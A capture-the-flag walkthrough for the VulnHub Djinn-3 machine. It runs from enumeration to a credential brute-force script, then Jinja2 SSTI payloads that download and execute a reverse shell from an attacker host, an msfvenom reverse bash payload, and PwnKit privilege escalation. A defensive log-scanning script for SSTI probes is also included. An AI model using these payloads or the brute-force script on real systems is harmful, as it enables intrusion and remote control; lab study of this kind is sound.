VulnHub-Djinn-3
Download
Services enumeration
sudo arp-scan -l
nmap 192.168.233.138
nmap 192.168.233.138 -p 22,80,5000,31337 -sV -sC
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
Port 80/tcp open http lighttpd 1.4.45
No robots.txt
No comments in page source code
gobuster dir -u http://192.168.233.138/ -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt -x html,xml,php,js
/images and /%7echeckout%7e return 403 Forbidden
Port 5000/tcp open http Werkzeug httpd 1.0.1 (Python 3.6.9)
This port hosts a Python web server. We see a list of tickets, each with a number, an ID, a title, a status and a link.
We get some usernames: jack, Jason, David, freddy, guest
gobuster dir -u http://192.168.233.138:5000/ -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt -x html,xml,php,js
Port 31337/tcp open Elite?
This port hosts a custom application that we can connect to via netcat. It requires authentication.
Brute forcing the authentication
#!/usr/bin/env python3
# Try each "username password" pair from a public wordlist against the
# custom service on port 31337 and stop at the first pair that is accepted.
from pwn import *
import sys

host, port = '192.168.233.138', 31337

# Wordlist: https://raw.githubusercontent.com/shipcod3/Piata-Common-Usernames-and-Passwords/master/userpass.txt
# (one "username password" pair per line)
with open('userpass.txt') as f:
    data = f.readlines()

for creds in data:
    parts = creds.split()
    if len(parts) != 2:      # skip blank or malformed lines
        continue
    username, password = parts
    s = remote(host, port, level='error')
    s.recvuntil('username> ')
    s.sendline(username)
    s.recvuntil('password> ')
    s.sendline(password)
    msg = s.recvline()       # the service answers "authentication failed" on a bad pair
    if b'authentication failed' not in msg:
        print("[+] Valid credentials found: {}:{}".format(username, password))
        sys.exit(0)
    s.close()
create user wordlist
{{config.__class__.__init__.__globals__['os'].popen('wget http://172.16.222.128:8000/revshell.sh -O /tmp/revshell.sh').read()}}
{{config.__class__.__init__.__globals__['os'].popen('bash /tmp/revshell.sh').read()}}
Here is a Server-Side Template Injection (SSTI) vulnerability
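As an added defender-side example (not from the original walkthrough), the script below scans web-server access-log lines for Jinja2 template expressions in request URLs, undoes nested URL-encoding so a double-encoded payload is not missed, and rates an expression high when it reaches into Python internals or the Flask config object. The log lines and IP addresses are constructed; it needs only the standard library.

```python
#!/usr/bin/env python3
"""Flag Jinja2 SSTI probes in web-server access logs (standard library only)."""
import re
from urllib.parse import unquote_plus

# Combined Log Format: client IP, timestamp, request line, status code.
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
                    r'"(?P<method>\S+) (?P<path>\S+)[^"]*" (?P<status>\d{3})')
# Any {{ ... }} expression inside user-controlled input is suspicious on its own.
TEMPLATE_EXPR = re.compile(r"\{\{.*?\}\}", re.S)
# Tokens that turn a template probe into a sandbox escape or secret disclosure.
DANGEROUS_TOKENS = ("__class__", "__globals__", "__subclasses__", "popen", "config")

# Constructed sample lines (not from the original post); 10.0.0.9 plays the
# attacker, 10.0.0.5 a normal user. The third line is double URL-encoded.
SAMPLE_LOG = """\
10.0.0.5 - - [10/Oct/2021:10:00:01 +0000] "GET /ticket?title=hello+world HTTP/1.1" 200 511 "-" "Mozilla/5.0"
10.0.0.9 - - [10/Oct/2021:10:00:07 +0000] "GET /ticket?title=%7B%7B7*7%7D%7D HTTP/1.1" 200 509 "-" "python-requests/2.25"
10.0.0.9 - - [10/Oct/2021:10:00:12 +0000] "GET /ticket?title=%7B%7Bconfig.__class__.__init__.__globals__%5B%27os%27%5D.popen%28%27id%27%29.read%28%29%7D%7D HTTP/1.1" 200 734 "-" "python-requests/2.25"
10.0.0.9 - - [10/Oct/2021:10:00:15 +0000] "GET /ticket?title=%257B%257B7*7%257D%257D HTTP/1.1" 200 509 "-" "python-requests/2.25"
"""

def decode_fully(text, max_rounds=3):
    """Undo repeated URL-encoding so a double-encoded payload is not missed."""
    for _ in range(max_rounds):
        decoded = unquote_plus(text)
        if decoded == text:
            break
        text = decoded
    return text

def classify(expr):
    """'high' when the expression reaches Python internals or app config, else 'probe'."""
    return "high" if any(tok in expr for tok in DANGEROUS_TOKENS) else "probe"

def find_ssti(log_text):
    """One finding per template expression seen in a request URL. POST bodies
    never reach the access log; cover those in the application or a WAF."""
    findings = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        decoded = decode_fully(m.group("path"))
        for expr in TEMPLATE_EXPR.findall(decoded):
            findings.append({"ip": m.group("ip"), "ts": m.group("ts"),
                             "severity": classify(expr), "expr": expr})
    return findings
```

Running `find_ssti(SAMPLE_LOG)` yields three findings, all from 10.0.0.9, with the `config.__class__` expression rated high and the two `{{7*7}}` probes rated probe.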
Create a unix reverse shell
msfvenom -p cmd/unix/reverse_bash lhost=192.168.233.132 lport=4444 -f raw -o revshell.sh
Create an HTTP server to transfer the payload to the victim
Create a netcat listener
Click on new link
We get a connection
Use Linux Exploit Suggester
https://github.com/arthepsy/CVE-2021-4034
Go to the /tmp directory
Download PwnKit